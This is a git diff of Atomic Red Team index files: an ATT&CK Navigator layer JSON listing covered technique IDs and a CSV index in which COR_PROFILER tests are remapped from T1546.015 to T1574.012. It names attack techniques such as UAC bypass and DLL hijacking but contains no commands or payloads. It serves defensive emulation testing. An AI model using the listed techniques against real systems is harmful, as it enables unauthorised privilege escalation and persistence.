:"T1074.001","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100
,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T153
1","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled"
:true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.010","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 20b13541..7eccea76 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
@@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"
techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":t
rue},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":1
00,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1546.015","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"e
nabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1
574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.010","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"e
nabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"en
abled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","scor
e":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"e
nabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqu
eID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.010","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 69df03ea..bd7593db 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -16,10 +16,10 @@ privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fod privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell +privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell +privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell +privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt -privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell -privilege-escalation,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell -privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt 
@@ -96,10 +96,10 @@ persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4ab persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual +persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell +persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell +persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt -persistence,T1546.015,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell -persistence,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell -persistence,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt 
